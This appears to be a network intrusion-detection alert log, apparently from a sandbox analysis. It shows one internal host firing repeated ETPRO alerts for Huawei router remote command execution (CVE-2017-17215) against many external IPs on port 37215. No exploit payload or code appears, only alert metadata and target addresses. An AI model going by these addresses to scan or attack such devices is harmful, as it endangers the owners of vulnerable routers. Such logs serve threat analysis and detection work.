                                                    07/10/24-08:27:33.934356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673837215192.168.2.1417.76.126.112
                                                    07/10/24-08:27:30.532382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4066637215192.168.2.14157.119.124.234
                                                    07/10/24-08:26:47.783932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814037215192.168.2.14191.136.81.239
                                                    07/10/24-08:26:15.791528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3802837215192.168.2.14197.102.143.27
                                                    07/10/24-08:27:11.527475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516837215192.168.2.1441.138.66.107
                                                    07/10/24-08:26:38.512743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4323037215192.168.2.14157.233.225.253
                                                    07/10/24-08:26:49.802852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697437215192.168.2.14157.49.164.177
                                                    07/10/24-08:26:29.775868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010037215192.168.2.14157.244.14.89
                                                    07/10/24-08:26:43.695962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116637215192.168.2.14157.38.248.159
                                                    07/10/24-08:27:30.492853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441237215192.168.2.14197.10.241.173
                                                    07/10/24-08:26:14.777046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435037215192.168.2.1441.211.205.206
                                                    07/10/24-08:26:15.803828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352637215192.168.2.1459.232.84.167
                                                    07/10/24-08:26:18.021892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3733837215192.168.2.14197.238.163.96
                                                    07/10/24-08:27:28.182611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025237215192.168.2.1458.13.215.18
                                                    07/10/24-08:26:41.390628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3969637215192.168.2.14197.177.171.50
                                                    07/10/24-08:27:33.966412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3784237215192.168.2.14197.190.18.59
                                                    07/10/24-08:26:11.156956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4394837215192.168.2.14157.209.178.18
                                                    07/10/24-08:26:25.490164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027437215192.168.2.14163.40.43.195
                                                    07/10/24-08:26:33.201787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5260037215192.168.2.14135.116.134.149
                                                    07/10/24-08:26:28.916413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847837215192.168.2.14197.27.99.236
                                                    07/10/24-08:27:10.558615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569037215192.168.2.14197.200.129.109
                                                    07/10/24-08:27:33.939106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411837215192.168.2.1441.88.31.235
                                                    07/10/24-08:27:24.863618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237037215192.168.2.14172.97.81.80
                                                    07/10/24-08:27:14.890246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593637215192.168.2.14157.220.89.16
                                                    07/10/24-08:26:14.806143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634637215192.168.2.14162.248.10.72
                                                    07/10/24-08:26:41.429574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060637215192.168.2.14157.205.89.157
                                                    07/10/24-08:26:42.347593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6094437215192.168.2.1441.204.110.107
                                                    07/10/24-08:27:28.155677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819237215192.168.2.1441.186.141.116
                                                    07/10/24-08:26:38.578082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450237215192.168.2.1441.79.55.36
                                                    07/10/24-08:27:31.558138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4994237215192.168.2.14157.34.143.227
                                                    07/10/24-08:27:19.312815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600837215192.168.2.1441.27.199.66
                                                    07/10/24-08:26:38.569394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542437215192.168.2.14157.200.235.205
                                                    07/10/24-08:26:49.785373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737637215192.168.2.1441.170.241.132
                                                    07/10/24-08:27:07.397076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4508437215192.168.2.14197.14.56.19
                                                    07/10/24-08:26:31.098508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5341837215192.168.2.1495.187.31.117
                                                    07/10/24-08:26:43.703555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051237215192.168.2.14197.98.60.117
                                                    07/10/24-08:26:59.634002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821837215192.168.2.1434.90.240.206
                                                    07/10/24-08:27:31.553494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5459837215192.168.2.14197.191.144.137
                                                    07/10/24-08:26:38.569923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4279037215192.168.2.1441.103.40.161
                                                    07/10/24-08:27:02.807421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3724837215192.168.2.14157.233.188.56
                                                    07/10/24-08:26:49.819720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833037215192.168.2.14197.126.114.58
                                                    07/10/24-08:27:13.833354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874237215192.168.2.14157.33.185.50
                                                    07/10/24-08:26:20.149592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503837215192.168.2.14197.226.13.65
                                                    07/10/24-08:26:25.509927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5220037215192.168.2.14123.22.108.67
                                                    07/10/24-08:26:57.633994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4228637215192.168.2.14157.189.183.18
                                                    07/10/24-08:27:17.078951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574037215192.168.2.1441.87.11.195
                                                    07/10/24-08:26:13.824785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481637215192.168.2.14166.13.183.126
                                                    07/10/24-08:26:15.840118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3294637215192.168.2.14157.208.163.124
                                                    07/10/24-08:26:17.972432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852637215192.168.2.1441.107.239.72
                                                    07/10/24-08:26:31.095355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759437215192.168.2.14157.146.171.23
                                                    07/10/24-08:27:21.455167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239637215192.168.2.1441.244.79.203
                                                    07/10/24-08:26:42.169251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854837215192.168.2.14197.249.55.188
                                                    07/10/24-08:26:45.623094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4845637215192.168.2.1441.221.93.77
                                                    07/10/24-08:26:18.000984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618237215192.168.2.14191.43.220.82
                                                    07/10/24-08:26:28.916413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484237215192.168.2.1441.92.180.138
                                                    07/10/24-08:27:28.128256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4577037215192.168.2.1435.190.84.205
                                                    07/10/24-08:26:11.452655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058437215192.168.2.14157.243.201.47
                                                    07/10/24-08:27:22.924312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491237215192.168.2.14157.197.100.236
                                                    07/10/24-08:26:20.183913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814237215192.168.2.1440.207.130.207
                                                    07/10/24-08:26:17.969206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495637215192.168.2.14197.103.172.143
                                                    07/10/24-08:27:10.767328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296437215192.168.2.1420.69.138.8
                                                    07/10/24-08:27:22.877679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749237215192.168.2.14157.82.79.230
                                                    07/10/24-08:26:11.129630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507837215192.168.2.14131.142.45.223
                                                    07/10/24-08:26:28.712584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.1441.43.27.56
                                                    07/10/24-08:27:34.118547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5898637215192.168.2.1490.91.222.205
                                                    07/10/24-08:27:24.871352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993237215192.168.2.14157.84.174.77
                                                    07/10/24-08:27:11.494437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860437215192.168.2.14157.52.195.166
                                                    07/10/24-08:26:11.609445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5999037215192.168.2.1441.85.36.131
                                                    07/10/24-08:27:03.040763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698437215192.168.2.1491.183.90.183
                                                    07/10/24-08:27:11.545525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930037215192.168.2.14133.65.168.157
                                                    07/10/24-08:26:13.833960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971237215192.168.2.14197.25.166.127
                                                    07/10/24-08:27:22.802348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387637215192.168.2.14157.83.240.248
                                                    07/10/24-08:26:20.175593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4489837215192.168.2.14157.252.210.178
                                                    07/10/24-08:27:32.521553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901837215192.168.2.1441.131.140.94
                                                    07/10/24-08:26:22.270060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678637215192.168.2.1441.233.141.255
                                                    07/10/24-08:26:22.301587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170037215192.168.2.14157.220.115.168
                                                    07/10/24-08:26:23.302644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5044237215192.168.2.14157.225.120.7
                                                    07/10/24-08:27:08.415966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649037215192.168.2.14197.109.68.109
                                                    07/10/24-08:26:57.536379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497037215192.168.2.14157.23.203.221
                                                    07/10/24-08:27:10.636807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917037215192.168.2.14157.140.23.82
                                                    07/10/24-08:26:41.452783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481637215192.168.2.14157.90.20.39
                                                    07/10/24-08:27:13.979728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4576837215192.168.2.1441.71.159.135
                                                    07/10/24-08:26:25.478024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296237215192.168.2.14212.250.133.198
                                                    07/10/24-08:26:53.134906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5600837215192.168.2.1441.176.113.27
                                                    07/10/24-08:27:20.482913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415637215192.168.2.14157.137.212.190
                                                    07/10/24-08:26:20.159669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315637215192.168.2.14157.63.55.134
                                                    07/10/24-08:27:24.980775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451637215192.168.2.14197.11.144.149
                                                    07/10/24-08:26:52.010263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441637215192.168.2.14205.115.121.86
                                                    07/10/24-08:27:17.068125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5936437215192.168.2.14157.234.26.79
                                                    07/10/24-08:26:36.343615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383437215192.168.2.14188.99.213.2
                                                    07/10/24-08:26:13.748733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543237215192.168.2.14197.95.228.157
                                                    07/10/24-08:27:13.980831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5712437215192.168.2.14197.178.212.190
                                                    07/10/24-08:26:59.701183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118637215192.168.2.14157.202.193.68
                                                    07/10/24-08:26:42.364468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158637215192.168.2.1441.163.62.129
                                                    07/10/24-08:26:14.799100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361637215192.168.2.14157.162.180.95
                                                    07/10/24-08:26:14.771626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786237215192.168.2.14197.35.19.57
                                                    07/10/24-08:26:34.191107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019037215192.168.2.1441.236.108.130
                                                    07/10/24-08:26:41.461581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285637215192.168.2.14197.153.138.28
                                                    07/10/24-08:27:22.938789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5175237215192.168.2.14197.167.56.90
                                                    07/10/24-08:26:25.473700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4040637215192.168.2.14167.161.92.187
                                                    07/10/24-08:26:29.866986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6043637215192.168.2.14157.57.144.172
                                                    07/10/24-08:27:22.469991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077437215192.168.2.14197.147.93.202
                                                    07/10/24-08:26:33.221493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5804237215192.168.2.14223.66.224.45
                                                    07/10/24-08:26:34.223623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5268037215192.168.2.14123.112.118.36
                                                    07/10/24-08:26:43.926715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127037215192.168.2.1441.199.67.197
                                                    07/10/24-08:26:43.784447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994637215192.168.2.14157.151.46.0
                                                    07/10/24-08:26:45.598670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269037215192.168.2.1441.121.2.245
                                                    07/10/24-08:27:02.726591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6072637215192.168.2.14197.221.197.85
                                                    07/10/24-08:27:05.205582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468237215192.168.2.14197.240.111.218
                                                    07/10/24-08:26:15.867031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104437215192.168.2.1491.0.2.130
                                                    07/10/24-08:26:14.736595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046237215192.168.2.14157.255.162.175
                                                    07/10/24-08:26:43.842656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406637215192.168.2.14157.195.128.13
                                                    07/10/24-08:27:23.870319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580037215192.168.2.14197.81.128.209
                                                    07/10/24-08:26:11.619310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235637215192.168.2.14157.229.181.22
                                                    07/10/24-08:27:19.273246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4096837215192.168.2.14157.125.55.29
                                                    07/10/24-08:27:22.571797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4578637215192.168.2.14157.220.241.59
                                                    07/10/24-08:27:34.122738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5646637215192.168.2.14157.129.190.240
                                                    07/10/24-08:27:05.087235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965437215192.168.2.14197.223.243.162
                                                    07/10/24-08:27:10.699441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3447637215192.168.2.14157.39.20.167
                                                    07/10/24-08:26:17.937591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359437215192.168.2.14197.130.188.21
                                                    07/10/24-08:27:03.015604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4767437215192.168.2.1481.205.196.26
                                                    07/10/24-08:27:07.342046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5086437215192.168.2.1441.187.84.39
                                                    07/10/24-08:27:08.421673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531237215192.168.2.14157.198.13.146
                                                    07/10/24-08:27:27.051851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5653837215192.168.2.14220.120.215.167
                                                    07/10/24-08:27:13.835787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728037215192.168.2.14157.242.4.80
                                                    07/10/24-08:27:22.794160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274637215192.168.2.1441.192.176.232
                                                    07/10/24-08:26:55.438982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335437215192.168.2.14157.223.180.35
                                                    07/10/24-08:27:33.839511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412837215192.168.2.14119.16.77.223
                                                    07/10/24-08:26:18.029316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5713037215192.168.2.1441.17.183.50
                                                    07/10/24-08:26:45.632030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4950837215192.168.2.14157.83.249.195
                                                    07/10/24-08:27:19.253247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590637215192.168.2.1451.115.126.163
                                                    07/10/24-08:26:29.784523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862837215192.168.2.1472.48.27.147
                                                    07/10/24-08:27:07.310052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867437215192.168.2.1441.110.38.93
                                                    07/10/24-08:27:32.563593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137037215192.168.2.14119.138.125.189
                                                    07/10/24-08:26:31.090625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4923037215192.168.2.14157.88.252.172
                                                    07/10/24-08:26:42.383706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631637215192.168.2.14157.6.197.64
                                                    07/10/24-08:26:42.419943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5027637215192.168.2.14197.234.107.24
                                                    07/10/24-08:26:38.599801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668437215192.168.2.14197.138.69.227
                                                    07/10/24-08:26:25.460773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222437215192.168.2.1441.30.71.211
                                                    07/10/24-08:26:47.895681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751837215192.168.2.14157.14.235.246
                                                    07/10/24-08:27:05.087235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128637215192.168.2.1441.4.135.56
                                                    07/10/24-08:27:10.583365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897437215192.168.2.14104.195.81.71
                                                    07/10/24-08:26:28.937799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742837215192.168.2.1441.245.166.64
                                                    07/10/24-08:27:27.063010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006637215192.168.2.14157.15.255.139
                                                    07/10/24-08:26:28.869440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746437215192.168.2.1488.190.175.33
                                                    07/10/24-08:27:11.520220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515837215192.168.2.14197.68.15.63
                                                    07/10/24-08:27:22.539034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3583437215192.168.2.14223.120.11.37
                                                    07/10/24-08:26:48.002898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4259837215192.168.2.14197.90.32.145
                                                    07/10/24-08:26:20.182553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6010237215192.168.2.14157.201.193.18
                                                    07/10/24-08:27:02.852572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354637215192.168.2.14157.191.124.139
                                                    07/10/24-08:27:08.385643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3648037215192.168.2.14212.187.209.149
                                                    07/10/24-08:26:23.320405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3823237215192.168.2.1441.198.1.16
                                                    07/10/24-08:26:52.027011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448637215192.168.2.14197.158.157.18
                                                    07/10/24-08:27:30.530198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452437215192.168.2.1441.188.86.44
                                                    07/10/24-08:27:05.083120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770837215192.168.2.1441.229.191.79
                                                    07/10/24-08:26:47.880980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3743437215192.168.2.14197.17.152.177
                                                    07/10/24-08:26:57.515772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499037215192.168.2.14157.76.18.88
                                                    07/10/24-08:27:02.770839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096037215192.168.2.1441.5.95.67
                                                    07/10/24-08:26:34.254772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979637215192.168.2.1441.124.51.186
                                                    07/10/24-08:26:22.281648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089637215192.168.2.14157.97.48.238
                                                    07/10/24-08:26:28.682326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112637215192.168.2.14197.219.37.186
                                                    07/10/24-08:27:08.417840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4096037215192.168.2.14221.8.125.226
                                                    07/10/24-08:26:47.774106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208437215192.168.2.1441.129.87.219
                                                    07/10/24-08:26:55.453359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067037215192.168.2.1441.101.220.60
                                                    07/10/24-08:26:28.798485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405837215192.168.2.14157.65.100.227
                                                    07/10/24-08:27:28.101557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580837215192.168.2.1441.66.246.48
                                                    07/10/24-08:26:47.868909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226037215192.168.2.14197.225.37.149
                                                    07/10/24-08:27:11.537934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407237215192.168.2.1482.65.163.11
                                                    07/10/24-08:27:08.439575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400037215192.168.2.14197.53.180.60
                                                    07/10/24-08:27:22.794160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461437215192.168.2.14149.149.8.144
                                                    07/10/24-08:27:30.556731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034837215192.168.2.14157.147.166.114
                                                    07/10/24-08:26:20.187886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038037215192.168.2.14157.210.227.125
                                                    07/10/24-08:26:43.872861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711837215192.168.2.1441.188.6.63
                                                    07/10/24-08:27:13.971781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058237215192.168.2.1417.94.242.6
                                                    07/10/24-08:27:32.549149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424837215192.168.2.14157.203.107.84
                                                    07/10/24-08:26:53.154328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3300437215192.168.2.14197.154.140.25
                                                    07/10/24-08:27:02.811605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493637215192.168.2.14197.20.5.177
                                                    07/10/24-08:26:28.754547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3416637215192.168.2.14197.37.172.51
                                                    07/10/24-08:26:43.657451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367437215192.168.2.1441.15.240.127
                                                    07/10/24-08:26:22.237344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5338237215192.168.2.14197.115.38.152
                                                    07/10/24-08:26:43.601358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3528437215192.168.2.14197.22.252.55
                                                    07/10/24-08:26:45.647337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060037215192.168.2.14157.177.200.150
                                                    07/10/24-08:27:08.385644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901837215192.168.2.14157.68.26.35
                                                    07/10/24-08:26:13.812708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600637215192.168.2.14197.178.173.188
                                                    07/10/24-08:26:28.639022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6068637215192.168.2.14197.26.94.11
                                                    07/10/24-08:26:45.587142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956637215192.168.2.1468.157.88.21
